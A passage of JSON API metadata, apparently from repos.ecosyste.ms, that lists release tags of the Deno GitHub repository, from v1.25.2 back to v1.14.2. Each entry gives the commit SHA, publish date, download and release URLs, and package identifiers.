ithub/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repo